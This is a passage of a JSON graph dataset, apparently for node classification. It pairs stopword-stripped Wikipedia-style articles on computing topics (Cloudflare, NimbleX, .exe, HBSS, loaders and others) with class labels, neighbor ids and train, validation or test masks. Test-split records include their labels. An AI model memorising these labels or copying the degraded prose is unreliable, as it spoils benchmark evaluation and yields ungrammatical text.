young relatively unknown company cloudflare provided dns routing dos protection white supremacist neo-nazi website daily stormer 2017 cloudflare stopped providing services daily stormer announcement controversial website asserted upper-echelons cloudflare secretly supporters ideology previously cloudflare refused take action regarding daily stormer despite widespread public pressure removal addressed blogpost cloudflare emphasized dedication towards freedom speech 'free speech absolutist cloudflare ceo matthew prince vowed never succumb external pressure sought create 'political umbrella future matthew prince addressed dangers large companies deciding allowed stay online concern shared number civil liberties groups privacy experts electronic frontier foundation said services cloudflare adjudicating speech acceptable adding illegal activity like inciting violence defamation occurs proper channel deal legal system according huffington post cloudflare provides services least 7 terrorist groups designated united states department state according article cloudflare provides services taliban hamas al-quds brigades among others aware since least 2012 taken action us justice department asked company discontinue services cloudflare came pressure due technical support provided discussion board 8chan allows users post discuss content free interference site administrator message board linked mass shootings united states christchurch mosque shootings new zealand addition number news organizations including washington post daily dot reported child pornography child rape discussion boards wake 2019 el paso shooting cloudflare announced terminating support 8chan due consistent use site terror purposes announcement ceo matthew prince warned end 8chan described previous events daily stormer unfortunately seen situation good sense play almost exactly two years ago made determination kick another disgusting site cloudflare network daily stormer caused brief interruption site operations quickly came back online using cloudflare competitor competitor time promoted feature fact n't respond legal process today daily stormer still available still disgusting bragged readers ever longer cloudflare problem remain internet problem wake pressured censor daily stormer cloudflare sought create alliance free speech organizations company could stand pressure next time number organizations including electronic frontier foundation u.s. digital rights charity joined project galileo supporting cloudflare free speech stance cloudflare vocal values ceo matthew prince stating one greatest strengths united states belief speech particularly political speech sacred website course nothing speech ... website speech bomb imminent danger creates provider affirmative obligation monitor make determinations theoretically harmful nature speech site may contain cloudflare services used rescator website sells payment card data two islamic state iraq levant top three online chat forums guarded cloudflare u.s. law enforcement asked discontinue service chosen november 2015 anonymous discouraged use cloudflare services following isil attacks paris renewed accusation provides help terrorists cloudflare responded calling accusers 15-year-old kids guy fawkes masks saying whenever concerns raised consult actual anti-terrorism experts abide law breaking long-standing policy total content neutrality cloudflare withdrew access services white supremacist web site daily stormer 16 august 2017 aftermath fatal vehicular attack charlottesville rally four days earlier withdrew website protection distributed denial service attack soon thereafter attackers took website ceo matthew prince stated woke morning bad mood decided kick internet tipping point decision team behind daily stormer made claim secretly supporters ideology andrew anglin editor daily stormer denied team made claim move disconnect daily stormer cloudflare services criticised 'dangerous prince anglin electronic frontier foundation august 2019 cloudflare terminated services 8chan american image board hacker group ugnazi attacked cloudflare partially via flaws google authentication systems june 2012 gaining administrative access cloudflare using deface 4chan cloudflare published full details hack following google publicly announced patched flaw google enterprise app account recovery process allowed hackers bypass two-step verification september 2016 february 2017 major cloudflare bug nicknamed cloudbleed leaked sensitive data—including passwords authentication tokens customer websites sending extra data response web requests leaks resulted buffer overflow occurred according analysis cloudflare approximately 1 every 3,300,000 http requests cloudflare publishes transparency report semi-annual basis show often law enforcement agencies request data clients may 2017 propublica reported cloudflare matter policy relays names email addresses persons complaining hate sites sites question led complainants harassed cloudflare general counsel defended company policies saying base constitutional law people face accusers response cloudflare updated abuse reporting process provide greater control notify complaining party cloudflare listed spamhaus providing spam support services pink contract current list spamhaus listings changes near daily basis reported issues addressed responsible website owner october 2015 report found cloudflare provisioned 40 ssl certificates used phishing sites deceptive domain names resembling banks payment processors july 2019 cloudflare suffered major outage rendered 12 million websites unreachable 27 minutes 80 customers affected websites responded blank 502 error page cloudflare published internal investigation results cause outage pinpointed faulty regular expression",
    "neighbors": [
      10368,
      9987,
      1157,
      3462,
      11158,
      923,
      157,
      5547,
      4268,
      7345,
      8244,
      7352,
      64,
      1474,
      2887,
      3018,
      331,
      6474,
      9293,
      82,
      5078,
      11222,
      7515,
      9181,
      3941,
      10344,
      2409,
      8170,
      9834,
      5749,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 8957,
    "label": 2,
    "text": "NimbleX:nimblex nimblex small slackware-based linux distribution optimized run cd usb drive network environment nimblex praised fast boots well small disk footprint considered surprising distribution using kde desktop environment nimblex also remarked web site allows users generate custom bootable images using web browser also covered mainstream romanian press first linux distribution put together romanian nimblex reported boot fast important factor user experience running optical media usb drives review 2007 nimblex edition noted expect boot less half time live cd fedora ubuntu knoppix takes recent review 2008 edition also noted nimblex speed easily one fastest bootups 've seen even tried hinder cripple boot time even dog slow pendrive old dirt test machine still booted amazingly fast desktop applications also fast nimblex also compact distribution review 2007 edition wondered managed include kde mention applications included size 200 mb window-based graphical user interface slimmed kde fit firefox web browser office documents editor koffice pdf reader media player play almost file formats without need install codec photo editing software gimp anti-virus bluetooth support integrated name applications included 2008 installation process major linux distributions customized creating custom installation disks usually called spins creating spin requires certain amount expertise creating spin run installation media requires customization nimblex makes process user-friendly providing web interface process similar embedded linux distributions e.g freewrt features made distribution popular early judge forums nimblex attracted surprisingly large number users relatively unknown distribution nimblex uses 2.6 kernel default gui kde slower computers default desktop environment exchanged one lower resource usage like fluxbox xfce typical office web browsing messaging components included nimblex hardly offers graphical administration tools — administration tasks like adding new user performed command line tradeoff allows nimblex small installation footprint — typical installation 400 megabytes additional applications installed using graphical installer gslapt codice_1 command line brings automatic resolution dependencies slackware packages text-mode hard driver installer available codice_2 considered beta quality 2008 edition 2008 edition comes three standard install images 200mb two smaller even ones 100 69mb installers allow customizations packets installation however nimblex 2008 uses kde 3.5.9 nimblex 2010 beta version also present site based kde 4 support new hardware user also enable compiz fusion via link desktop openoffice.org included instead koffice provided office suite nimblex included 200 mb package useful applications like firefox web browser koffice pdf reader kopete instant messenger klamav anti-virus gimp photo editor bluetooth support remote connection pc important software supported bigger nimblex package openoffice.org java python samba wine windows applications emulator many applications compiled community included distribution nimblex 2008 criticized irresponsible lacking common security features box even though clamav anti-virus guarddog firewall installed default non-root user account created installation root password required log desktop default root password displayed nimblex web site nimblex 2010 also fixed applications removed another problem nimblex packages created repackaging slackware packages since nimblex installs fewer libraries sometimes results uninstallable unusable packages reviews",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      5677,
      6189,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      1632,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      2230,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      6371,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      4355,
      5380,
      7435,
      2321,
      5397,
      6934,
      4887,
      8992,
      10530,
      6436,
      2853,
      3369,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      8554,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      975,
      5078,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 8958,
    "label": 9,
    "text": "Hierarchical_Music_Specification_Language:hierarchical music specification language hierarchical music specification language hmsl music programming language written 1980s larry polansky phil burk david rosenboom mills college written top forth allowed creation real-time interactive music performance systems algorithmic composition software kind program requires high degree musical informatics distributed frog peak music runs light memory footprint ~1 megabyte macintosh amiga systems unlike csound languages audio synthesis hmsl primarily language making music interfaces sound-making devices built-in midi classes however high degree built-in understanding music performance practice tuning systems score reading main interface manipulation musical parameters metaphor shapes created altered combined create musical texture either response real-time scheduled events score hmsl widely used composers working algorithmic composition twenty years addition authors also composers hmsl used pieces nick didkovsky hub james tenney tom erbe pauline oliveros java port hmsl developed nick didkovsky name jmsl designed interface jsyn api",
    "neighbors": [
      3904,
      9210,
      7172,
      8262,
      5037,
      7535,
      3665,
      7571,
      8947,
      6933,
      7769,
      6810,
      9565,
      7550
    ],
    "mask": "Test"
  },
  {
    "node_id": 8959,
    "label": 2,
    "text": ".exe:.exe exe file contains executable program windows exe short executable standard file extension used windows programs many windows users exe files synonymous windows programs making .exe one recognizable file extensions several file formats may used file extension 16-bit 32-bit windows executable run windows execution starts either ne pe ignores mz code known dos stub started dos stub typically displays message program run dos mode similar exiting cleanly thereby constituting minimal form fat binary dual-mode programs mz-ne mz-pe regedit older winzip self extractors include functional dos section besides also many custom exe formats including limited w3 collection le files used win386.exe w4 compressed collection le files used vmm32.vxd dl mp p2 p3 last three used phar lap extenders",
    "neighbors": [
      11270,
      6664,
      5643,
      4624,
      8215,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      7251,
      10839,
      603,
      9819,
      3170,
      4712,
      622,
      9839,
      2672,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      9340,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      2804,
      3834,
      1791,
      11519,
      6921,
      3856,
      3351,
      8473,
      11546,
      8988,
      5928,
      3881,
      10024,
      10026,
      10029,
      7986,
      9525,
      10039,
      4409,
      3386,
      6972,
      3394,
      2380,
      3410,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      9066,
      9593,
      2942,
      2943,
      1922,
      1418,
      5003,
      5004,
      8080,
      10141,
      11677,
      929,
      11683,
      430,
      10673,
      5557,
      4023,
      6584,
      9655,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573,
      3065
    ],
    "mask": "None"
  },
  {
    "node_id": 8960,
    "label": 4,
    "text": "Mark_Rasch:mark rasch mark d. rasch attorney author working areas corporate government cybersecurity privacy incident response former chief security evangelist verizon communications vice president deputy general counsel chief privacy data security officer saic 1983 1992 rasch worked u.s. department justice within criminal division fraud section rasch earned j.d 1983 state university new york buffalo 1976 graduate bronx high school science prosecuted robert tappan morris case united states v. morris 1991 also drafted amicus brief related data encryption doj v bernstein prosecuted presidential candidate lyndon larouche organized crime figures new york associated gambino crime family also helped uncover individual responsible so-called craigslist murder boston assisted investigation lead arrest chelsea manning rasch regular contributor securitycurrent securityfocus security boulevard issues related law technology regular contributor wired magazine also longtime columnist storefrontbacktalk now-defunct publication tracked global retail technology appeared quoted msnbc fox news cnn new york times forbes pbs washington post npr national international media",
    "neighbors": [
      8368,
      311
    ],
    "mask": "Test"
  },
  {
    "node_id": 8961,
    "label": 8,
    "text": "Remark_Media:remark media remark media global digital media company specializes creating technology platforms user interfaces combine content social media spun discovery communications howstuffworks 2007 remark media owns operates international versions howstuffworks china brazil digital publisher certain content world book china company founding partner sharecare searchable social q healthcare platform organizing answering questions health company formerly known hsw international remark media also provides client services including strategic counsel concept design content production technology development implementation project management analytics company clients include major media companies boutique businesses start-ups company publicly listed nasdaq included russell index approximately 100 employees worldwide u.s. offices new york atlanta international offices beijing são paulo 2006 hsw international founded subsidiary howstuffworks bring website global emerging economies one year later company launched first international version howstuffworks – comotudofunciona brazil october 2007 hsw international went public nasdaq connection merger intac international merger facilitated launch company ’ second international version howstuffworks – bowenwang china 2008 2008 company acquired us website dailystrength – social media website hosting health wellness discussions starting 2009 part establishing joint venture harpo studios dr. mehmet oz discovery communications sony pictures television jeff arnold founder webmd company developed launched social q health website sharecare may 2011 partnership discovery communications company developed launched website curiosity.discovery.com – q site discovery channel ’ tv show curiosity october 2011 company announced would change name remark media december 2011 company formally changed name remark media nasdaq stock ticker mark",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 8962,
    "label": 6,
    "text": "Amazon_Elastic_File_System:amazon elastic file system amazon elastic file system amazon efs cloud storage service provided amazon web services aws designed provide scalable elastic concurrent restrictions encrypted file storage use aws cloud services on-premises resources amazon efs built able grow shrink automatically files added removed amazon efs supports network file system nfs versions 4.0 4.1 nfsv4 protocol control access files portable operating system interface posix permissions according amazon use cases file system service typically include content repositories development environments web server farms home directories big data applications amazon efs provides open-after-close consistency semantics applications expect nfs amazon efs available aws regions asia pacific seoul became available may 2018",
    "neighbors": [
      8451,
      9224,
      6027,
      3993,
      5660,
      11038,
      11556,
      2217,
      3629,
      7983,
      10681,
      11201,
      5960,
      10185,
      4298,
      8266,
      590,
      7248,
      7512,
      8921,
      735,
      1001,
      5612,
      3696,
      8181,
      7802,
      8446
    ],
    "mask": "None"
  },
  {
    "node_id": 8963,
    "label": 6,
    "text": "GNU_fcrypt:gnu fcrypt gnu fcrypt disk encryption software project intended offer multiple hidden partitions fly encryption automatic transparent encryption plausible deniability disbanded project part gnu project november 2012 richard stallman dubbed fcrypt official gnu project program called gnu fcrypt software encryption intended prove resistant cracked quantum computers",
    "neighbors": [
      3572,
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 8964,
    "label": 9,
    "text": "Synthesis_Toolkit:synthesis toolkit synthesis toolkit stk open source api real time audio synthesis emphasis classes facilitate development physical modelling synthesizers written c++ written maintained perry cook princeton university gary scavone mcgill university contains low-level synthesis signal processing classes oscillators filters etc higher-level instrument classes contain examples currently available physical modelling algorithms use today stk free software number classes particularly physical modelling algorithms covered patents held stanford university yamaha stk used widely creating software synthesis applications versions stk instrument classes integrated chuck csound real-time cmix max/msp part percolate supercollider faust ported symbianos ios well",
    "neighbors": [
      3665,
      7172,
      6933,
      8262
    ],
    "mask": "None"
  },
  {
    "node_id": 8965,
    "label": 7,
    "text": "Appserver.io:appserver.io appserver.io application server php based web environments project consists middleware delivers classical php web applications provides additional services basic idea wildfly equivalent php present within techdivision well july 2013 development project began due technical shortcomings php language time possibility non-blocking socket-based php middleware given using asynchronous event driven workflow forked processes parallel august 2012 threading extension php joe watkins enabled true posix compatible multithreading controversially threads used allow programmer account hardware usage instead relying used runtime environment enable easier communication parallel working batches deciding technical blueprint development began github platform project consisted 36 separate repositories around 80,000 lines code estimated effort 18 years cocomo model appserver.io open-source software osl version 3.0 downloaded either installable package project page source github project aims freemium marketing approach splitting software community professional enterprise edition community edition contained base features open source free charge professional edition could used within microsoft azure cloud service offers additional developer support appserver.io includes runtime environment containing php extended external libraries php extensions service daemons out-of-the-box runtime environment php development use multithreading environment considered break so-called shared nothing concept php allows inter-process communication object level together bundled runtime appserver.io bundles administration version 0.6.0 application management implemented file-based application deployment appserver.io offers servlets objects persist client requests eliminate repeated bootstrapping applications require wrapping bootstrap parts appserver.io offers enterprise bean implementation similar enterprise java beans functionality appserver.io offers modular services used individually internal external applications features appserver.io allows component-based scalability services servers e.g http webserver adjustable size number based xml configuration file additional components configured remote access allowing distributed systems component replication appserver.io early stage development project provided tested pre-release versions github development releases regularly published homepage appserver.io follows naming convention based major minor version numbers major digit specifies context minor version names exist 1.* major version named iron stands mythological view medieval age every minor version 1.x within major release consist noun describing something common major context",
    "neighbors": [
      4960,
      8644,
      4423,
      4589,
      6797,
      1935,
      7983,
      4817,
      10798,
      1556,
      11221,
      823,
      8122,
      3517,
      2045,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 8966,
    "label": 3,
    "text": "Loader_(computing):loader computing computer systems loader part operating system responsible loading programs libraries one essential stages process starting program places programs memory prepares execution loading program involves reading contents executable file containing program instructions memory carrying required preparatory tasks prepare executable running loading complete operating system starts program passing control loaded program code operating systems support program loading loaders apart highly specialized computer systems fixed set specialized programs embedded systems typically loaders instead code executes directly rom order load operating system part booting specialized boot loader used many operating systems loader resides permanently memory though operating systems support virtual memory may allow loader located region memory pageable case operating systems support virtual memory loader may actually copy contents executable files memory rather may simply declare virtual memory subsystem mapping region memory allocated contain running program code contents associated executable file see memory-mapped file virtual memory subsystem made aware pages region memory need filled demand program execution actually hits areas unfilled memory may mean parts program code actually copied memory actually used unused code may never loaded memory unix loader handler system call codice_1 unix loader tasks include microsoft windows 7 loader codice_3 function contained ntdll.dll following operating systems need relocating loaders adjust addresses pointers executable compensate variations address loading starts operating systems need relocating loaders program always loaded location address space pointers absolute addresses rather offsets program base address well-known examples ibm os/360 system/360 mainframes descendants including z/os z/architecture mainframes os/360 descendant systems privileged operating system facility called iewfetch internal component os supervisor whereas non-privileged loader application perform many functions plus linkage editor entirely external os supervisor although certainly uses many supervisor services iewfetch utilizes highly specialized channel programs theoretically possible load relocate entire executable within one revolution dasd media 16.6 ms maximum 8.3 ms average legacy 3,600 rpm drives load modules exceed track size also possible load relocate entire module without losing revolution media iewfetch also incorporates facilities so-called overlay structures facilitates running potentially large executables minimum memory model small 44 kb versions os 88 kb 128 kb common os nucleus always resident portion supervisor formatted way compatible stripped-down version iewfetch unlike normal executables os nucleus scatter loaded parts nucleus loaded different portions memory particular certain system tables required reside initial 64 kb tables code may reside elsewhere system linkage editor application named iewl iewl main function associate load modules executable programs object modules output say assemblers compilers including automatic calls libraries high-level language built-in functions format may efficiently loaded iewfetch large number editing options conventional application commonly employed load module format includes initial text record followed immediately relocation and/or control record text record followed instances text record relocation and/or control record pairs end module text records usually large relocation and/or control records small iewfetch three relocation and/or control record buffers fixed 260 bytes smaller relocation and/or control records certainly possible 260 bytes maximum possible iewl ensures limitation complied inserting additional relocation records required next text record necessary special case sequence records may ... text record relocation record ... control record text record ... special byte within relocation and/or control record buffer used disabled bit spin communication area initialized unique value read ccw relocation and/or control record program controlled interrupt bit set processor thereby notified ccw accessed channel via special ios exit point processor enters disabled bit spin loop sometimes called shortest loop world byte changes initialized value cpu exits bit spin relocation occurs gap within media relocation and/or control record next text record relocation finished next record nop ccw following read changed tic loading relocating proceed using next buffer channel stop nop ccw restarted iewfetch via another special ios exit three buffers continuous circular queue pointing next last pointing first three buffers constantly reused loading relocating proceeds iewfetch thereby load relocate load module practical size minimum possible time dynamic linking loaders another type loader load link shared libraries like .so files .dll files already loaded running programs",
    "neighbors": [
      1922,
      4998,
      6664,
      6921,
      11656,
      6797,
      11539,
      7071,
      6950,
      6829,
      7983,
      5040,
      7728,
      7607,
      5432,
      9911,
      3386,
      1724,
      10176,
      9921,
      1219,
      4424,
      5065,
      5578,
      8012,
      5840,
      1106,
      7421,
      2138,
      477,
      2786,
      8037,
      1775,
      7792,
      11632,
      5363,
      2804,
      5492,
      9331,
      2168,
      2811,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8967,
    "label": 8,
    "text": "Composite_application:composite application computing composite application software application built combining multiple existing functions new application technical concept compared mashups however composite applications use business sources e.g. existing modules even web services information mashups usually rely web-based often free sources wrong assume composite applications definition part service-oriented architecture soa composite applications built using technology architecture composite application consists functionality drawn several different sources components may individual selected functions within applications entire systems whose outputs packaged business functions modules web services composite applications often incorporate orchestration local application logic control composed functions interact produce new derived functionality composite applications based soa ws-caf web services standard composite applications",
    "neighbors": [
      489,
      4107
    ],
    "mask": "Test"
  },
  {
    "node_id": 8968,
    "label": 4,
    "text": "Host_Based_Security_System:host based security system host based security system hbss official name given united states department defense dod commercial-off-the-shelf cots suite software applications used within dod monitor detect defend dod computer networks systems enterprise-wide information assurance computer network defense solutions steering group essg sponsored acquisition hbss system use within dod enterprise network hbss deployed non-classified internet protocol routed network niprnet secret internet protocol routed network siprnet networks priority given installing niprnet hbss based mcafee inc epolicy orchestrator epo mcafee point product security applications host intrusion prevention system hips seeing need supply comprehensive department-wide security suite tools dod system administrators essg started gather requirements formation host-based security system summer 2005 march 2006 bae systems mcafee awarded contract supply automated host-based security system department award 22 pilot sites identified receive first deployments hbss pilot roll dod system administrators around world identified trained using hbss software preparation software deployment across dod october 9 2007 joint task force global network operations jtf-gno released communications tasking order cto 07-12 deployment host based security system hbss mandating deployment hbss combatant command service agency cc/s/a networks within dod completion date 3rd quarter 2008 release cto brought hbss attention major department heads cc/s/a providing essg necessary authority enforce deployment agencies willing comply cto risked disconnected dod global information grid gig lack compliance lessons learned pilot deployments provided valuable insight hbss program eventually leading defense information systems agency disa supplying pre-loaded hbss hardware well providing hbss software image could loaded compliant hardware platforms proved invaluable easing deployment task newly trained hbss system administrators provided consistent department-wide software baseline disa provided step-by-step documentation completing hbss baseline creation freshly installed operating system lessons learned niprnet deployments simplified process deploying hbss siprnet throughout lifetime hbss undergone several major baseline updates well minor maintenance releases first major release hbss known baseline 1.0 contained mcafee epolicy orchestrator engine hips software compliance profiler scp rogue system detection rsd asset baseline manager abm assets software new releases introduced software products evolved new products added cases completely replaced different products january 2011 hbss currently baseline 4.5 maintenance release 2.0 mr2 mr2 contains following software heart mcafee epolicy orchestrator epo management engine hbss mcafee tools responsible mcafee considers point product individual software applications controlled epo server hbss point products consist following host intrusion prevention system hips consists host-based firewall application-level blocking consolidated single product hips component one significant components hbss provides capability block known intrusion signatures restrict unauthorized services applications running host machines policy auditor pa introduced hbss baseline 2.0 policy auditor responsible ensuring compliance mandates payment card industry data security standard pci dss sarbanes–oxley act 2002 sox gramm–leach–bliley act 1999 glba health insurance portability accountability act 1996 hipaa federal information security management act 2002 fisma well best practice frameworks control objectives information related technology cobit pa maps controls predefined policy content mcafee policy auditor helps report consistently accurately key industry mandates internal policies across infrastructure specific targeted systems policy auditor agent-based audit solution leverages security content automation protocol scap automate processes required internal external audits assets baseline module released baseline 1.0 government off-the-shelf gots product used address system baseline configurations changes order respond information operations condition infocon infocon changes necessary times heightened security threats system initial deployment stages hbss assets module juvenile lacked much products intended capabilities however application fully evolved robust feature packed version capable handling original software design goals abm originally known assets 1.0 upgraded assets 2.0 hbss baseline 2.0 later called assets 3000 hbss baseline 3.0 rogue system detector rsd component hbss used provide real-time detection new hosts attaching network rsd monitors network segments reports hosts seen network epo server epo server determines whether system connected epo server mcafee agent installed identified exception considered rogue epo server take appropriate action concerning rogue host specified rsd policy hbss baseline 1.0 introduced rsd 1.0 rsd updated 2.0 hbss baseline 2.0 dcm component hbss introduced hbss baseline 2.0 specifically address use usb devices dod networks jtf-gno cto 09-xxx removable flash media device implementation within department defense dod networks released march 2009 allowed use usb removable media provided meets conditions stated within cto one conditions requires use hbss dcm module installed configured manage usb devices attached system dcm renamed data loss prevention dlp hbss baseline 3.0 mr3 assets publishing service aps hbss introduced hbss baseline 4.0 allow enclaves report asset information third-party dod entity standards-compliant format adds contextual information hbss assets allows improved reporting features systems relying hbss data according jtf-gno cto 07-12 dod agencies required deploy hbss networks disa made hbss software available download pki protected patch server users attempting download software required common access card cac .mil network disa provides software updates free charge dod entities additionally hbss administrators require satisfactory completion hbss training commonly appointed unit section commander writing order receive administer hbss system system administrators must satisfactorily complete online class hbss training well identified hbss administrator online training takes 30 hours complete class training requires four days excluding travel advanced hbss class also available hbss administrators wishing acquire in-depth knowledge system hbss online class training managed disa information pertaining training classes obtained disa information assurance support environment iase website disa risk management executive office formerly field security office fso provides free technical support hbss administrators help desk disa three tiers support tier tier iii tier tier ii support provided disa fso tier iii support provided mcafee disa fso support available using one following methods current pace hbss updated several times original baseline 1.0 current baseline 3.0 mr3 version within baseline 3.0 maintenance releases introduced every two four months bringing better stability security release hbss follows mcafee epo version updates closely expected continue trend epo continuously developed",
    "neighbors": [
      704,
      10831,
      5780,
      8471,
      7388
    ],
    "mask": "Test"
  },
  {
    "node_id": 8969,
    "label": 1,
    "text": "Tibero:tibero tibero relational databases database management system utility developed tmaxsoft tmaxsoft developing tibero since 2003 2008 second company world deliver shared-disk-based cluster tac main products tibero tibero mmdb tibero prosync tibero infinidata tibero datahub tibero relational database management system rdbms considered alternative oracle databases due complete compatibility oracle products including sql tibero guarantees reliable database transactions logical sets sql statements supporting acid atomicity consistency isolation durability providing enhanced synchronization databases tibero 5 enables reliable database service operation multi node environment tibero implemented unique tibero thread architecture address disadvantages previous dbms result tibero make efficient use system resources cpu memory fewer server processes ensures tibero offers combination performance stability expandability facilitating development administration functions additionally provides users developers various standard development interface easily integrate dbms 3rd party tools addition block transfer technology applied improve ‘ tibero active cluster ’ shared db clustering technology similar oracle rac tibero supports self-tuning based performance optimization reliable database monitoring performance management korea tibero adopted 450 companies across range industries finance manufacturing communication public sector globally 14 companies july 2011 tibero uses multiple working processes working process uses multiple threads number processes threads changed user requests handled thread pool removes overhead dispatcher handles input/output processing memory usage number os processes reduced using thread pool number simultaneous processes changed tibero following three processes listener receives requests new connections clients assigns available working thread listener plays intermediate role clients working threads using independent executable file tblistener background processes independent processes primarily perform time-consuming disk operations specified intervals request working thread another background process following processes belong background process group tibero rdbms provides distributed database links data replication database clustering tibero active cluster tac similar oracle rac. parallel query processing query optimizer conforms sql standard specifications development interfaces guarantees high compatibility types databases features include row-level locking multi-version concurrency control parallel query processing partition table support tibero rdbms enables stable efficient management dbmss guarantees high-performance transaction processing using tibero active cluster hereafter tac technology failover operation based shared disk clustering system environment tac allows instances different nodes share data via shared disk supports stable system operation 24x365 fail-over function optimal transaction processing guaranteeing integrity data instance ’ memory tac main feature tibero providing high scalability availability instances executed tac environment execute transactions using shared database access shared database mutually controlled data consistency conformity processing time reduced larger job divided smaller jobs jobs performed several nodes multiple systems share data files based shared disks nodes act use single shared cache sending receiving data blocks necessary organize tac high speed private network connects nodes even node stops operating nodes continue services transition happens quickly transparently tac cluster system application level provides high availability scalability types applications recommended apply replication architecture servers also hardware storage devices helps improve high availability virtual ip vip assigned node tac cluster node tac cluster failed public ip accessed virtual ip used connections connection failover following main components tac",
    "neighbors": [
      11136,
      8969,
      5612,
      6797,
      10286,
      7983,
      10640,
      6993,
      10389,
      823,
      1304
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8970,
    "label": 7,
    "text": "GGPO:ggpo ggpo short good game peace middleware designed help create near-lagless online experience various emulated arcade games fighting games program created tony cannon co-founder fighting game community site shoryuken popular evolution championship series creation ggpo creator tony cannon completely dissatisfied 2006 xbox 360 re-release experiencing criticized online capabilities reaction service cannon began development ggpo released first ever version late 2006 cannon later demonstrated ggpo capcom positively received downloadable ggpo client supported many games capcom snk including super street fighter ii turbo king fighters 2002 metal slug x use built-in emulator video game companies also implemented licensed version ggpo games using include skullgirls killer instinct 2013 video game ggpo uses netcode technique called “ rollback ” rather waiting input received players simulating next frame ggpo predicts inputs send simulates next frame without delay using assumption players ’ inputs arrive input ’ match prediction ggpo rolls back state game last correct state replays players ’ revised inputs back current frame hope predictions correct time allowing smooth play minimal sudden changes game state system highly similar client-side prediction applied peer-to-peer setup client program allow players manually adjust latency high-ping situations either creating possibly-jerky yet accurate representation smoother game input delay ggpo originally bundled client enabled users play supported games online players matchmaking system allowed players request challenges users non-participants could spectate match chat challenge initiated match ran rom prepackaged emulator finalburn alpha client discontinued superseded clients make use ggpo networking middleware",
    "neighbors": [
      3793,
      8122,
      6797,
      7983
    ],
    "mask": "Train"
  },
  {
    "node_id": 8971,
    "label": 4,
    "text": "RunScanner:runscanner runscanner freeware microsoft windows system utility scans windows system configured running programs autostart locations program created best worlds effort combine positive features similar programs like hijackthis autoruns silentrunners unlike similar programs runscanner connects online database rate good bad items main purpose database whitelisting instead blacklisting runscanner scans windows autostart locations gives user possibility delete misconfigured malware items inexperienced users post log files forums specialist helpers help solve malware problems advanced users use features modern malware fighters come expect unlike similar software runscanner also exchange binary files users",
    "neighbors": [
      5636,
      11401,
      6797,
      7983,
      7413,
      7515
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8972,
    "label": 2,
    "text": "Virtual_machine_introspection:virtual machine introspection computing virtual machine introspection vmi technique monitoring runtime state system-level virtual machine vm helpful debugging forensic analysis term introspection application virtual machines introduced garfinkel rosenblum invented approach protecting security application attack malicious software called vmi vmi common term different virtual machine forensics analysis methods vmi-based approaches widely used security applications software debugging systems management vmi tools may located inside outside virtual machine act tracking events interrupts memory writes sending requests virtual machine virtual machine monitor usually provides low-level information like raw bytes memory converting low-level view something meaningful user known semantic gap problem solving problem requires analysis understanding systems monitored programs running inside vm may provide information processes information may sent network interface virtual devices like serial port examples vivo introspection programs windbg gdb servers interact remote debugger drawback approach requires functioning os within vm os hangs n't loaded yet introspection agent could n't work vmi tools may implemented within virtual machine monitor separate programs capture information e.g. contents memory virtual machine monitor data interpreted understand processes system one popular tools interpretation volatility framework framework contains profiles many popular operating systems may extract different information like process tree list kernel objects",
    "neighbors": [
      5457
    ],
    "mask": "Test"
  },
  {
    "node_id": 8973,
    "label": 9,
    "text": "Bootstrapping_(compilers):bootstrapping compilers computer science bootstrapping technique producing self-compiling compiler — compiler assembler written source programming language intends compile initial core version compiler bootstrap compiler generated different language could assembly language successive expanded versions compiler developed using minimal subset language many compilers many programming languages bootstrapped including compilers basic algol c c pascal pl/i factor haskell modula-2 oberon ocaml common lisp scheme go java rust python scala nim eiffel bootstrapping compiler following advantages note points assume language runtime also written language one needs compile compiler language x written language x issue first compiler compiled different methods used practice solving chicken egg problem include methods distributing compilers source code include providing portable bytecode version compiler bootstrap process compiling compiler t-diagram notation used explain compiler bootstrap techniques cases convenient way get complicated compiler running system little software involves series ever sophisticated assemblers compilers assemblers first language tools bootstrap first high-level language provide bootstrap neliac 1958 first widely used languages burroughs b5000 algol 1961 lisp 1962 hart levin wrote lisp compiler lisp mit 1962 testing inside existing lisp interpreter improved compiler point could compile source code self-hosting technique possible interpreter already exists language compiled borrows directly notion running program input also used various proofs theoretical computer science proof halting problem undecidable due security concerns regarding trusting trust attack various attacks binary trustworthiness multiple projects working reduce effort bootstrapping source also allowing everyone verify source executable correspond include bootstrappable builds project reproducible builds project following programming languages self-hosting compilers",
    "neighbors": [
      512,
      6016,
      4486,
